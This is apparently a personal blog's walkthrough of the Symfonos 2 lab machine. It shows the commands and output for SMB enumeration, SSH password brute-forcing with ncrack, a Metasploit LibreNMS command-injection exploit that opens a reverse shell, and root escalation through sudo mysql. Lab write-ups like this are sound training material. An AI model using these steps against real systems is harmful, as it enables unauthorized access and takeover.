5 December 2022

Pentesting Fun Stuff

following the cyber security path…

Symfonos 2

This is the second of the Symfonos series by @zayotic. Its description is an OSCP-like Intermediate real life based machine designed to teach the importance of understanding a vulnerability and can be found here.

Enumeration

As always starting with a port scan to found out which ports are open and which services are running behind them.

PORT    STATE SERVICE     VERSION
21/tcp  open  ftp         ProFTPD 1.3.5
22/tcp  open  ssh         OpenSSH 7.4p1 Debian 10+deb9u6 (protocol 2.0)
| ssh-hostkey: 
|   2048 9d:f8:5f:87:20:e5:8c:fa:68:47:7d:71:62:08:ad:b9 (RSA)
|   256 04:2a:bb:06:56:ea:d1:93:1c:d2:78:0a:00:46:9d:85 (ECDSA)
|_  256 28:ad:ac:dc:7e:2a:1c:f6:4c:6b:47:f2:d6:22:5b:52 (ED25519)
80/tcp  open  http        WebFS httpd 1.21
|_http-server-header: webfs/1.21
|_http-title: Site doesn't have a title (text/html).
139/tcp open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp open  netbios-ssn Samba smbd 4.5.16-Debian (workgroup: WORKGROUP)
MAC Address: 00:0C:29:D7:5B:50 (VMware)
Service Info: Host: SYMFONOS2; OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

Host script results:
|_clock-skew: mean: 1h39m58s, deviation: 2h53m12s, median: -2s
|_nbstat: NetBIOS name: SYMFONOS2, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
| smb-os-discovery: 
|   OS: Windows 6.1 (Samba 4.5.16-Debian)
|   Computer name: symfonos2
|   NetBIOS computer name: SYMFONOS2\x00
|   Domain name: \x00
|   FQDN: symfonos2
|_  System time: 2019-08-02T01:16:44-05:00
| smb-security-mode: 
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
| smb2-security-mode: 
|   2.02: 
|_    Message signing enabled but not required
| smb2-time: 
|   date: 2019-08-02 08:16:44
|_  start_date: N/A

The following ports are open:

  • 21 – runs FTP (ProFTP version 1.3.5)
  • 22 – runs SSH (OpenSSH version 7.4p1)
  • 80 – runs HTTP (WebFS version 1.21)
  • 139 – SMB (smbd version 3.X-4.X)
  • 445 – SMB (smbd version 4.5.16 – Debian)

FTP

Lets start with FTP as this version has a known vulnerability which let you execute certain commands without authentication.

root@cyberspace:~/symfonos2# nc 10.10.10.15 21
220 ProFTPD 1.3.5 Server (ProFTPD Default Installation) [10.10.10.15]
site help
214-The following SITE commands are recognized (* =>'s unimplemented)
 CPFR <sp> pathname
 CPTO <sp> pathname
 HELP
 CHGRP
 CHMOD
214 Direct comments to root@symfonos2

This are the commands available. I can copy files on the remote machine, change a group and change the permission on a file. It looks like this is a setup for a later stadium. These commands will give me some options once I have access. For now I’m going to check out the other options.

Webserver

This website consist out of an image. DirSearch can’t find any folder other than the main landing page. The source of the page holds no useful information. Next is the Samba server.

Samba

root@cyberspace:~/symfonos2# smbmap -r -H 10.10.10.15
[+] Finding open SMB ports....
[+] Guest SMB session established on 10.10.10.15...
[+] IP: 10.10.10.15:445	Name: unkown                                            
	Disk                                                  	Permissions
	----                                                  	-----------
	print$                                            	NO ACCESS
	anonymous                                         	READ ONLY
	./                                                 
	dr--r--r--                0 Thu Jul 18 16:30:09 2019	.
	dr--r--r--                0 Thu Jul 18 16:29:08 2019	..
	dr--r--r--                0 Thu Jul 18 16:25:17 2019	backups
	IPC$                                              	NO ACCESS

Looks like a folder with some information I can read.

	IPC$                                              	NO ACCESS
root@cyberspace:~/symfonos2# smbclient \\\\10.10.10.15\\anonymous
Enter WORKGROUP\root's password: 
Try "help" to get a list of possible commands.
smb: \> ls
  .                                   D        0  Thu Jul 18 16:30:09 2019
  ..                                  D        0  Thu Jul 18 16:29:08 2019
  backups                             D        0  Thu Jul 18 16:25:17 2019

		19728000 blocks of size 1024. 16313716 blocks available
smb: \> cd backups
smb: \backups\> ls
  .                                   D        0  Thu Jul 18 16:25:17 2019
  ..                                  D        0  Thu Jul 18 16:30:09 2019
  log.txt                             N    11394  Thu Jul 18 16:25:16 2019

		19728000 blocks of size 1024. 16313716 blocks available
smb: \backups\> get log.txt
getting file \backups\log.txt of size 11394 as log.txt (3708.9 KiloBytes/sec) (average 3709.0 KiloBytes/sec)

The file is a log file with information about the samba config and the ftp config. In it there are some interesting things.

root@symfonos2:~# cat /etc/shadow > /var/backups/shadow.bak
root@symfonos2:~# cat /etc/samba/smb.conf
[anonymous]
   path = /home/aeolus/share
   browseable = yes
   read only = yes
   guest ok = yes

I try to find more information, but at this time I really can not find any opening on how to get access to the machine. My last resort is brute forcing the username I found on the SSH server, but I really don’t like this option. It is very loud and in real life you really don’t want to try this as it can crash the server easily. But for now I think I don’t have a choice.

SSH

There are a lot of tools to brute force SSH, like patator, medusa, hydra, metasploit and many others. I’m going to use ncrack and tweak the threads so I don’t crash the server.

root@cyberspace:~/symfonos2# ncrack -v -u aeolus -P rockyou.txt 10.10.10.15:22 -T2

It took a really long time to crack this password as I’m on a VM. This is why I really don’t like brute forcing SSH. The long wait for this password is a bit disappointing.

Discovered credentials for ssh on 10.10.10.15 22/tcp:
10.10.10.15 22/tcp ssh: 'aeolus' 'sergioteamo'

With the password found I can finally access the remote machine.

root@cyberspace:~/symfonos2# ssh aeolus@10.10.10.15
aeolus@10.10.10.15's password: 
Linux symfonos2 4.9.0-9-amd64 #1 SMP Debian 4.9.168-1+deb9u3 (2019-06-16) x86_64

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Thu Jul 18 08:52:59 2019 from 192.168.201.1
aeolus@symfonos2:~$

Escalation of Privileges (EoP)

Running ss shows the current sockets. From this there are some services listening only on localhost.

aeolus@symfonos2:~$ ss -tupan | grep -i listen
tcp    LISTEN     0      80     127.0.0.1:3306                  *:*                  
tcp    LISTEN     0      50        *:139                   *:*                  
tcp    LISTEN     0      128    127.0.0.1:8080                  *:*                  
tcp    LISTEN     0      32        *:21                    *:*                  
tcp    LISTEN     0      128       *:22                    *:*                  
tcp    LISTEN     0      20     127.0.0.1:25                    *:*                  
tcp    LISTEN     0      50        *:445                   *:*                  
tcp    LISTEN     0      50       :::139                  :::*                  
tcp    LISTEN     0      64       :::80                   :::*                  
tcp    LISTEN     0      128      :::22                   :::*                  
tcp    LISTEN     0      20      ::1:25                   :::*                  
tcp    LISTEN     0      50       :::445                  :::*

For this I create a SSH tunnel from my machine to the remote machine so it will forward all the traffic. In this case I can direct my browser to my localhost, port 8080 and it will be forwarded to the remote machine.

root@cyberspace:~/symfonos2# searchsploit librenms
--------------------------------------------------------------------------------------------------------------------------------------------------- ----------------------------------------
 Exploit Title                                                                                                                                     |  Path
                                                                                                                                                   | (/usr/share/exploitdb/)
--------------------------------------------------------------------------------------------------------------------------------------------------- ----------------------------------------
LibreNMS - addhost Command Injection (Metasploit)                                                                                                  | exploits/linux/remote/46970.rb
LibreNMS 1.46 - 'addhost' Remote Code Execution                                                                                                    | exploits/php/webapps/47044.py
--------------------------------------------------------------------------------------------------------------------------------------------------- ----------------------------------------
Shellcodes: No Result

There is a known vulnerability for LibreNMS. I choose the metasploit module to use. For this exploit I need valid credentials and as I only have one set….

msf5 exploit(linux/http/librenms_addhost_cmd_inject) > options

Module options (exploit/linux/http/librenms_addhost_cmd_inject):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   PASSWORD   sergioteamo      yes       Password for LibreNMS
   Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS     127.0.0.1        yes       The target address range or CIDR identifier
   RPORT      8080             yes       The target port (TCP)
   SSL        false            no        Negotiate SSL/TLS for outgoing connections
   TARGETURI  /                yes       Base LibreNMS path
   USERNAME   aeolus           yes       User name for LibreNMS
   VHOST                       no        HTTP server virtual host


Payload options (cmd/unix/reverse):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  10.10.10.16      yes       The listen address (an interface may be specified)
   LPORT  9999             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Linux


msf5 exploit(linux/http/librenms_addhost_cmd_inject) > exploit

[*] Started reverse TCP double handler on 10.10.10.16:9999 
[*] Successfully logged into LibreNMS. Storing credentials...
[+] Successfully added device with hostname dyczzhbe
[*] Accepted the first client connection...
[*] Accepted the second client connection...
[+] Successfully deleted device with hostname dyczzhbe and id #1
[*] Command: echo vtPYmvTObe97GfCg;
[*] Writing to socket A
[*] Writing to socket B
[*] Reading from sockets...
[*] Reading from socket A
[*] A: "vtPYmvTObe97GfCg\r\n"
[*] Matching...
[*] B is input...
[*] Command shell session 1 opened (10.10.10.16:9999 -> 10.10.10.15:50890) at 2019-08-02 14:37:25 +0200

id
uid=1001(cronus) gid=1001(cronus) groups=1001(cronus),999(librenms)
python -c 'import pty;pty.spawn("/bin/bash");'
cronus@symfonos2:/opt/librenms/html$ 
cronus@symfonos2:/opt/librenms/html$ sudo -l
sudo -l
Matching Defaults entries for cronus on symfonos2:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User cronus may run the following commands on symfonos2:
    (root) NOPASSWD: /usr/bin/mysql

I can use sudo to access MySQL as root. With MySQL I can drop a shell giving me the permissions at that moment. In this case, root.

cronus@symfonos2:/opt/librenms/html$ sudo mysql 
sudo mysql
Welcome to the MariaDB monitor.  Commands end with ; or \g.
Your MariaDB connection id is 5560
Server version: 10.1.38-MariaDB-0+deb9u1 Debian 9.8

Copyright (c) 2000, 2018, Oracle, MariaDB Corporation Ab and others.

Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.

MariaDB [(none)]> \! bash
\! bash
root@symfonos2:/opt/librenms/html# whoami
whoami
root

Time to finish this up.

root@symfonos2:~# cat proof.txt
cat proof.txt

	Congrats on rooting symfonos:2!

           ,   ,
         ,-`{-`/
      ,-~ , \ {-~~-,
    ,~  ,   ,`,-~~-,`,
  ,`   ,   { {      } }                                             }/
 ;     ,--/`\ \    / /                                     }/      /,/
;  ,-./      \ \  { {  (                                  /,;    ,/ ,/
; /   `       } } `, `-`-.___                            / `,  ,/  `,/
 \|         ,`,`    `~.___,---}                         / ,`,,/  ,`,;
  `        { {                                     __  /  ,`/   ,`,;
        /   \ \                                 _,`, `{  `,{   `,`;`
       {     } }       /~\         .-:::-.     (--,   ;\ `,}  `,`;
       \\._./ /      /` , \      ,:::::::::,     `~;   \},/  `,`;     ,-=-
        `-..-`      /. `  .\_   ;:::::::::::;  __,{     `/  `,`;     {
                   / , ~ . ^ `~`\:::::::::::<<~>-,,`,    `-,  ``,_    }
                /~~ . `  . ~  , .`~~\:::::::;    _-~  ;__,        `,-`
       /`\    /~,  . ~ , '  `  ,  .` \::::;`   <<<~```   ``-,,__   ;
      /` .`\ /` .  ^  ,  ~  ,  . ` . ~\~                       \\, `,__
     / ` , ,`\.  ` ~  ,  ^ ,  `  ~ . . ``~~~`,                   `-`--, \
    / , ~ . ~ \ , ` .  ^  `  , . ^   .   , ` .`-,___,---,__            ``
  /` ` . ~ . ` `\ `  ~  ,  .  ,  `  ,  . ~  ^  ,  .  ~  , .`~---,___
/` . `  ,  . ~ , \  `  ~  ,  .  ^  ,  ~  .  `  ,  ~  .  ^  ,  ~  .  `-,

	Contact me via Twitter @zayotic to give feedback!

Conclusion

I really enjoyed this challenge. In my opinion I would skip the brute forcing part and try and put in a better way to let people retrieve the password. Also I was surprised there was nothing left to do with the exploit on the FTP server.

But at the end, the challenge was pretty nice and I would like to thank the creator for some outstanding work. For now I’m done, but the next machine will be certainly the third and final part of this series.

 

 

Leave a Reply

Your email address will not be published. Required fields are marked *

This site uses Akismet to reduce spam. Learn how your comment data is processed.